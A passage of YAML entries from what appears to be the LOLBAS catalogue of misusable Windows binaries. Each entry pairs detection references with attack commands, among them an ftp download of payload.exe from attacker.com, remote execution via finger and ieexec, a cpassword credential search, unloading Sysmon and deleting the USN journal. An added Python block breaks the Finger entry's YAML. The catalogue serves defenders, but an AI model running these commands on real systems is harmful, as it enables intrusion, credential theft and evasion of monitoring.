  - Command: extrac32 {PATH_SMB:.cab} {PATH_ABSOLUTE}:file.exe
    Description: Extracts the source CAB file on a UNC path into an Alternate Data Stream (ADS) of the target file.
    Usecase: Extract data from a remote cab file and hide it in an alternate data stream.
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Type: Compression
  - Command: extrac32 /Y /C {PATH_SMB} {PATH_ABSOLUTE}
    Description: Copies the source file to the destination file, overwriting it if present.
    Usecase: Download file from UNC/WebDAV
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: extrac32.exe /C {PATH_ABSOLUTE:.source.exe} {PATH_ABSOLUTE:.dest.exe}
    Description: Copies a file from one folder to another
    Usecase: Copy file
    Category: Copy
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\extrac32.exe
  - Path: C:\Windows\SysWOW64\extrac32.exe
Detection:
  - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml
Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  - Link: https://twitter.com/egre55/status/985994639202283520
Acknowledgement:
  - Person: egre55
    Handle: '@egre55'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'
  - Person: Hai Vaknin (Lux)
    Handle: '@VakninHai'
  - Person: Tamir Yehuda
    Handle: '@tim8288'

================================================
FILE: yml/OSBinaries/Findstr.yml
================================================
---
Name: Findstr.exe
Description: Write to ADS, discover, or download files with Findstr.exe
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: findstr /V /L W3AllLov3LolBas {PATH_ABSOLUTE:.exe} > {PATH_ABSOLUTE}:file.exe
    Description: Searches for the string W3AllLov3LolBas; since it does not exist, /V passes every line through and the specified .exe file is written to an Alternate Data Stream (ADS) of the specified target file.
    Usecase: Add a file to an alternate data stream to hide from defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE}:file.exe
    Description: Searches for the string W3AllLov3LolBas; since it does not exist, /V passes every line through and the remote .exe file is written to an Alternate Data Stream (ADS) of the specified target file.
    Usecase: Add a file from a WebDAV server to an alternate data stream to hide from defensive counter measures
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: findstr /S /I cpassword \\sysvol\policies\*.xml
    Description: Search for stored passwords in Group Policy Preference files stored on SYSVOL.
    Usecase: Find credentials stored in the cpassword attribute
    Category: Credentials
    Privileges: User
    MitreID: T1552.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
  - Command: findstr /V /L W3AllLov3LolBas {PATH_SMB:.exe} > {PATH_ABSOLUTE:.exe}
    Description: Searches for the string W3AllLov3LolBas; since it does not exist, /V passes every line through and the remote .exe is downloaded to the target file.
    Usecase: Download/Copy file from a WebDAV server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\findstr.exe
  - Path: C:\Windows\SysWOW64\findstr.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml
Resources:
  - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Finger.yml
================================================
---
Name: Finger.exe
Description: Displays information about a user or users on a specified remote computer that is running the Finger service or daemon
Author: Ruben Revuelta
Created: 2021-08-30
Commands:
  - Command: finger user@example.host.com | more +2 | cmd
    Description: 'Downloads a payload from a remote Finger server. This example connects to "example.host.com" asking for user "user"; the response can contain attacker-chosen command lines, which `more +2` strips of its first two lines and cmd then reads from the pipe and executes.'
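The Finger entry relies on how little protocol there is: the client sends one query line over TCP and prints whatever the server returns, so the "user information" can be a script. The following is an added example, not code from the LOLBAS project, that re-enacts the `finger user@host | more +2 | cmd` pipeline locally in Python: a throwaway Finger server on an ephemeral loopback port (the real service listens on 79), a client that does what finger.exe does on the wire, and a `more +2` emulation that drops the leading lines finger.exe prints before the body. The server response, the skipped header lines and the payload lines are constructed for the example.

```python
"""Added example (not LOLBAS project code): local re-enactment of
`finger user@example.host.com | more +2 | cmd`.

Finger (RFC 1288) is one TCP request: the client sends the query line
terminated by CRLF, the server writes free-form text and closes the
connection. finger.exe prints that text verbatim, so a server under the
attacker's control can return command lines, and `more +2` discards the two
leading lines (finger.exe's own `[host]` header and whatever banner the
server prepends) before cmd reads the remainder from the pipe.
Everything here runs on 127.0.0.1 on an ephemeral port, not on port 79.
"""
from __future__ import annotations

import socket
import threading

# Constructed server response: two "header" lines that `more +2` will skip,
# then the body that would reach cmd.
CONSTRUCTED_RESPONSE = (
    "Login: user                             Name: Example User\r\n"
    "Directory: /home/user                   Shell: /bin/sh\r\n"
    "echo finger-delivered-payload\r\n"
    "exit /b 0\r\n"
)


def serve_once(response: str, host: str = "127.0.0.1") -> tuple[int, threading.Thread]:
    """Bind an ephemeral loopback port, answer exactly one Finger query, then stop."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(1)
    port = srv.getsockname()[1]

    def handle() -> None:
        conn, _ = srv.accept()
        with conn:
            # RFC 1288 {Q1} query: a user name followed by CRLF.
            query = b""
            while not query.endswith(b"\r\n"):
                chunk = conn.recv(64)
                if not chunk:
                    break
                query += chunk
            # A real server would look the user up; this one returns the
            # constructed text regardless of the query.
            conn.sendall(response.encode())
        srv.close()

    t = threading.Thread(target=handle, daemon=True)
    t.start()
    return port, t


def finger(user: str, host: str, port: int = 79, timeout: float = 5.0) -> str:
    """Client side of `finger user@host`: send the query, read until the server closes."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(f"{user}\r\n".encode())
        buf = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            buf += chunk
    return buf.decode(errors="replace")


def more_skip(text: str, n: int) -> str:
    """Emulate `more +n`: drop the first n lines and pass the rest through unchanged."""
    lines = text.splitlines(keepends=True)
    return "".join(lines[n:])


def run_exchange(response: str = CONSTRUCTED_RESPONSE) -> str:
    """Full pipeline up to (but not including) cmd: returns what cmd would read."""
    port, thread = serve_once(response)
    raw = finger("user", "127.0.0.1", port)
    thread.join(timeout=5)
    return more_skip(raw, 2)


if __name__ == "__main__":
    print(run_exchange(), end="")
```

Detection-wise the interesting property is the one the example makes visible: nothing in the exchange identifies the content as a script, so the signal is finger.exe itself (it has no business on a workstation) and its outbound connection, which is what the Sigma rule and the IOCs in this entry key on.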
    Usecase: Download malicious payload
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 8.1, Windows 10, Windows 11, Windows Server 2008, Windows Server 2008R2, Windows Server 2012, Windows Server 2012R2, Windows Server 2016, Windows Server 2019, Windows Server 2022
Full_Path:
  - Path: c:\windows\system32\finger.exe
  - Path: c:\windows\syswow64\finger.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_finger_usage.yml
  - IOC: finger.exe should not be run on a normal workstation.
  - IOC: finger.exe connecting to external resources.
Resources:
  - Link: https://twitter.com/DissectMalware/status/997340270273409024
  - Link: https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/ff961508(v=ws.11)
Acknowledgement:
  - Person: Ruben Revuelta (MAPFRE CERT)
    Handle: '@rubn_RB'
  - Person: Jose A. Jimenez (MAPFRE CERT)
    Handle: '@Ocelotty6669'
  - Person: Malwrologist
    Handle: '@DissectMalware'

================================================
FILE: yml/OSBinaries/FltMC.yml
================================================
---
Name: fltMC.exe
Description: Filter Manager Control Program used by Windows
Author: John Lambert
Created: 2021-09-18
Commands:
  - Command: fltMC.exe unload SysmonDrv
    Description: Unloads the SysmonDrv minifilter driver used by Sysmon; the same subcommand unloads minifilters belonging to other security agents.
    Usecase: Defense evasion
    Category: Tamper
    Privileges: Admin
    MitreID: T1562.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\fltMC.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_fltmc_unload_driver_sysmon.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_via_filter_manager.toml
  - Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/unload_sysmon_filter_driver.yml
  - IOC: Security event 4688 (process creation) for fltMC.exe with `unload` in the command line
Resources:
  - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon
Acknowledgement:
  - Person: Carlos Perez
    Handle: '@Carlos_Perez'

================================================
FILE: yml/OSBinaries/Forfiles.yml
================================================
---
Name: Forfiles.exe
Description: Selects and executes a command on a file or set of files. This command is useful for batch processing.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{CMD}"
    Description: Executes the specified command because there is a match for notepad.exe in the c:\windows\system32 folder.
    Usecase: Use forfiles to start a new process to evade defensive counter measures
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
  - Command: forfiles /p c:\windows\system32 /m notepad.exe /c "{PATH_ABSOLUTE}:evil.exe"
    Description: Executes evil.exe from an Alternate Data Stream (ADS) because there is a match for notepad.exe in the c:\windows\system32 folder.
    Usecase: Use forfiles to start a new process from a binary hidden in an alternate data stream
    Category: ADS
    Privileges: User
    MitreID: T1564.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\forfiles.exe
  - Path: C:\Windows\SysWOW64\forfiles.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml
Resources:
  - Link: https://twitter.com/vector_sec/status/896049052642533376
  - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
  - Link: https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Acknowledgement:
  - Person: Eric
    Handle: '@vector_sec'
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Fsutil.yml
================================================
---
Name: Fsutil.exe
Description: File System Utility
Author: Elliot Killick
Created: 2021-08-16
Commands:
  - Command: fsutil.exe file setZeroData offset=0 length=9999999999 {PATH_ABSOLUTE}
    Description: Zero out the contents of a file
    Usecase: Can be used to forensically erase a file's contents
    Category: Tamper
    Privileges: User
    MitreID: T1485
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: 'fsutil.exe usn deletejournal /d c:'
    Description: Deletes the USN change journal of the C: volume to hide file creation activity
    Usecase: Can be used to hide file creation activity from tools that rely on the USN journal
    Category: Tamper
    Privileges: User
    MitreID: T1485
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10
  - Command: fsutil.exe trace decode
    Description: Executes a pre-planted binary named netsh.exe from the current directory.
    Usecase: Spawn a pre-planted executable from fsutil.exe.
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows 11
    Tags:
      - Execute: EXE
Full_Path:
  - Path: C:\Windows\System32\fsutil.exe
  - Path: C:\Windows\SysWOW64\fsutil.exe
Detection:
  - IOC: fsutil.exe should not be run on a normal workstation
  - IOC: file setZeroData (not case-sensitive) in the process arguments
  - IOC: Sysmon Event ID 1
  - IOC: Execution of fsutil.exe with `trace decode` could be suspicious
  - IOC: Execution of a netsh.exe that is not the Windows binary (e.g. loaded from the current directory rather than System32)
  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml
Resources:
  - Link: https://twitter.com/0gtweet/status/1720724516324704404
Acknowledgement:
  - Person: Elliot Killick
    Handle: '@elliotkillick'
  - Person: Jimmy
    Handle: '@bohops'
  - Person: Grzegorz Tworek
    Handle: '@0gtweet'

================================================
FILE: yml/OSBinaries/Ftp.yml
================================================
---
Name: Ftp.exe
Description: A binary designed for connecting to FTP servers
Author: Oddvar Moe
Created: 2018-12-10
Commands:
  - Command: echo !{CMD} > ftpcommands.txt && ftp -s:ftpcommands.txt
    Description: Executes the commands placed in the script file; a line beginning with `!` is handed to the shell.
    Usecase: Spawn a new process using ftp.exe. For a `!command` line ftp.exe runs `cmd /C command`.
    Category: Execute
    Privileges: User
    MitreID: T1202
    OperatingSystem: Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: cmd.exe /c "@echo open attacker.com 21>ftp.txt&@echo USER attacker>>ftp.txt&@echo PASS PaSsWoRd>>ftp.txt&@echo binary>>ftp.txt&@echo GET /payload.exe>>ftp.txt&@echo quit>>ftp.txt&@ftp -s:ftp.txt -v"
    Description: Builds an ftp script file and runs it to download payload.exe from the attacker's FTP server.
    Usecase: Spawn a new process using ftp.exe. Ftp.exe downloads the binary.
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
Full_Path:
  - Path: C:\Windows\System32\ftp.exe
  - Path: C:\Windows\SysWOW64\ftp.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml
  - IOC: cmd /c as child process of ftp.exe
Resources:
  - Link: https://twitter.com/0xAmit/status/1070063130636640256
  - Link: https://medium.com/@0xamit/lets-talk-about-security-research-discoveries-and-proper-discussion-etiquette-on-twitter-10f9be6d1939
  - Link: https://ss64.com/nt/ftp.html
  - Link: https://www.asafety.fr/vuln-exploit-poc/windows-dos-powershell-upload-de-fichier-en-ligne-de-commande-one-liner/
Acknowledgement:
  - Person: Casey Smith
    Handle: '@subtee'
  - Person: BennyHusted
    Handle: ''
  - Person: Amit Serper
    Handle: '@0xAmit'

================================================
FILE: yml/OSBinaries/Gpscript.yml
================================================
---
Name: Gpscript.exe
Description: Used by group policy to process scripts
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: Gpscript /logon
    Description: Executes logon scripts configured in Group Policy.
    Usecase: Add a local group policy logon script to execute a file and hide from defensive counter measures
    Category: Execute
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
  - Command: Gpscript /startup
    Description: Executes startup scripts configured in Group Policy
    Usecase: Add a local group policy startup script to execute a file and hide from defensive counter measures
    Category: Execute
    Privileges: Administrator
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
Full_Path:
  - Path: C:\Windows\System32\gpscript.exe
  - Path: C:\Windows\SysWOW64\gpscript.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml
  - IOC: Scripts added in local group policy
  - IOC: Execution of Gpscript.exe after logon
Resources:
  - Link: https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/Hh.yml
================================================
---
Name: Hh.exe
Description: Binary used for processing chm files in Windows
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: HH.exe {REMOTEURL:.bat}
    Description: Opens the target batch script with HTML Help, fetching it from the URL.
    Usecase: Download files from a URL
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Application: GUI
  - Command: HH.exe {PATH_ABSOLUTE:.exe}
    Description: Executes the specified executable with HTML Help.
    Usecase: Execute a process with HH.exe
    Category: Execute
    Privileges: User
    MitreID: T1218.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: EXE
      - Application: GUI
  - Command: HH.exe {REMOTEURL:.chm}
    Description: Executes a remote .chm file, which can contain commands.
    Usecase: Execute commands with HH.exe
    Category: Execute
    Privileges: User
    MitreID: T1218.001
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: CMD
      - Execute: CHM
      - Execute: Remote
Full_Path:
  - Path: C:\Windows\hh.exe
  - Path: C:\Windows\SysWOW64\hh.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_chm_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_hh_html_help_susp_child_process.yml
  - Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/execution_via_compiled_html_file.toml
  - Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/execution_html_help_executable_program_connecting_to_the_internet.toml
  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_spawn_child_process.yml
  - Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_html_help_url_in_command_line.yml
Resources:
  - Link: https://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/
Acknowledgement:
  - Person: Oddvar Moe
    Handle: '@oddvarmoe'

================================================
FILE: yml/OSBinaries/IMEWDBLD.yml
================================================
---
Name: IMEWDBLD.exe
Description: Microsoft IME Open Extended Dictionary Module
Author: Wade Hickey
Created: 2020-03-05
Commands:
  - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe {REMOTEURL}
    Description: IMEWDBLD.exe attempts to load a dictionary file; if given a URL as an argument, it downloads the file served at that URL and saves it to INetCache.
    Usecase: Download file from Internet
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/network_connection/net_connection_win_imewdbld.yml
Resources:
  - Link: https://twitter.com/notwhickey/status/1367493406835040265
Acknowledgement:
  - Person: Wade Hickey
    Handle: '@notwhickey'

================================================
FILE: yml/OSBinaries/Ie4uinit.yml
================================================
---
Name: Ie4uinit.exe
Description: Executes commands from a specially prepared ieuinit.inf file.
Author: Oddvar Moe
Created: 2018-05-25
Commands:
  - Command: ie4uinit.exe -BaseSettings
    Description: Executes commands from a specially prepared ieuinit.inf file located next to a copy of ie4uinit.exe.
    Usecase: Get code execution by copying ie4uinit.exe and a crafted ieuinit.inf to another location
    Category: Execute
    Privileges: User
    MitreID: T1218
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: INF
Full_Path:
  - Path: c:\windows\system32\ie4uinit.exe
  - Path: c:\windows\sysWOW64\ie4uinit.exe
  - Path: c:\windows\system32\ieuinit.inf
  - Path: c:\windows\sysWOW64\ieuinit.inf
Detection:
  - IOC: ie4uinit.exe copied outside of %windir%
  - IOC: ie4uinit.exe loading an inf file (ieuinit.inf) from outside %windir%
  - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml
Resources:
  - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/
Acknowledgement:
  - Person: Jimmy
    Handle: '@bohops'

================================================
FILE: yml/OSBinaries/Iediagcmd.yml
================================================
---
Name: iediagcmd.exe
Description: Diagnostics Utility for Internet Explorer
Author: manasmbellani
Created: 2022-03-29
Commands:
  - Command: 'set windir=c:\test& cd "C:\Program Files\Internet Explorer\" & iediagcmd.exe /out:{PATH_ABSOLUTE:.cab}'
    Description: Executes a binary pre-planted at C:\test\system32\netsh.exe, because iediagcmd.exe resolves netsh.exe relative to the %windir% variable, which the command overrides.
    Usecase: Spawn a pre-planted executable from iediagcmd.exe.
Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows 10 1803, Windows 10 1703, Windows 10 22H1, Windows 10 22H2, Windows 11 Tags: - Execute: EXE Full_Path: - Path: C:\Program Files\Internet Explorer\iediagcmd.exe Detection: - Sigma: https://github.com/manasmbellani/mycode_public/blob/master/sigma/rules/win_proc_creation_lolbin_iediagcmd.yml - IOC: Sysmon Event ID 1 - IOC: Execution of process iediagcmd.exe with /out could be suspicious Resources: - Link: https://twitter.com/Hexacorn/status/1507516393859731456 Acknowledgement: - Person: Adam Handle: '@hexacorn' ================================================ FILE: yml/OSBinaries/Ieexec.yml ================================================ --- Name: Ieexec.exe Description: The IEExec.exe application is an undocumented Microsoft .NET Framework application that is included with the .NET Framework. You can use the IEExec.exe application as a host to run other managed applications that you start by using a URL. Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: ieexec.exe {REMOTEURL:.exe} Description: Downloads and executes executable from the remote server. Usecase: Download and run attacker code from remote location Category: Download Privileges: User MitreID: T1105 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - Execute: EXE (.NET) - Command: ieexec.exe {REMOTEURL:.exe} Description: Downloads and executes executable from the remote server. 
Usecase: Download and run attacker code from remote location Category: Execute Privileges: User MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Tags: - Execute: Remote - Execute: EXE (.NET) Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\ieexec.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\ieexec.exe Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml - Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_misc_lolbin_connecting_to_the_internet.toml - Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml - IOC: Network connections originating from ieexec.exe may be suspicious Resources: - Link: https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/ Acknowledgement: - Person: Casey Smith Handle: '@subtee' ================================================ FILE: yml/OSBinaries/Ilasm.yml ================================================ --- Name: Ilasm.exe Description: used for compile c# code into dll or exe. Author: Hai vaknin (lux) Created: 2020-03-17 Commands: - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /exe Description: Binary file used by .NET to compile C#/intermediate (IL) code to .exe Usecase: Compile attacker code on system. Bypass defensive counter measures. 
Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 - Command: ilasm.exe {PATH_ABSOLUTE:.txt} /dll Description: Binary file used by .NET to compile C#/intermediate (IL) code to dll Usecase: A description of the usecase Category: Compile Privileges: User MitreID: T1127 OperatingSystem: Windows 7, Windows 10, Windows 11 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ilasm.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ilasm.exe Detection: - IOC: Ilasm may not be used often in production environments (such as on endpoints) - Sigma: https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml Resources: - Link: https://github.com/LuxNoBulIshit/BeforeCompileBy-ilasm/blob/master/hello_world.txt Acknowledgement: - Person: Hai Vaknin(Lux) Handle: '@VakninHai' - Person: Lior Adar ================================================ FILE: yml/OSBinaries/Infdefaultinstall.yml ================================================ --- Name: Infdefaultinstall.exe Description: Binary used to perform installation based on content inside inf files Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: InfDefaultInstall.exe {PATH:.inf} Description: Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file. 
Usecase: Code execution Category: Execute Privileges: Admin MitreID: T1218 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: INF Full_Path: - Path: C:\Windows\System32\Infdefaultinstall.exe - Path: C:\Windows\SysWOW64\Infdefaultinstall.exe Code_Sample: - Code: https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a Detection: - Sigma: https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_infdefaultinstall_execute_sct_scripts.yml - BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules Resources: - Link: https://twitter.com/KyleHanslovan/status/911997635455852544 - Link: https://blog.conscioushacker.io/index.php/2017/10/25/evading-microsofts-autoruns/ - Link: https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/ Acknowledgement: - Person: Kyle Hanslovan Handle: '@kylehanslovan' ================================================ FILE: yml/OSBinaries/Installutil.yml ================================================ --- Name: Installutil.exe Description: The Installer tool is a command-line utility that allows you to install and uninstall server resources by executing the installer components in specified assemblies Author: Oddvar Moe Created: 2018-05-25 Commands: - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. Usecase: Use to execute code and bypass application whitelisting Category: AWL Bypass Privileges: User MitreID: T1218.004 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11 Tags: - Execute: DLL (.NET) - Execute: EXE (.NET) - Command: InstallUtil.exe /logfile= /LogToConsole=false /U {PATH:.dll} Description: Execute the target .NET DLL or EXE. 
    Usecase: Use to execute code and bypass application whitelisting
    Category: Execute
    Privileges: User
    MitreID: T1218.004
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Execute: DLL (.NET)
      - Execute: EXE (.NET)
  - Command: InstallUtil.exe {REMOTEURL}
    Description: It will download a remote payload and place it in INetCache.
    Usecase: Downloads payload from remote server
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11
    Tags:
      - Download: INetCache
Full_Path:
  - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
  - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml
  - Sigma: https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml
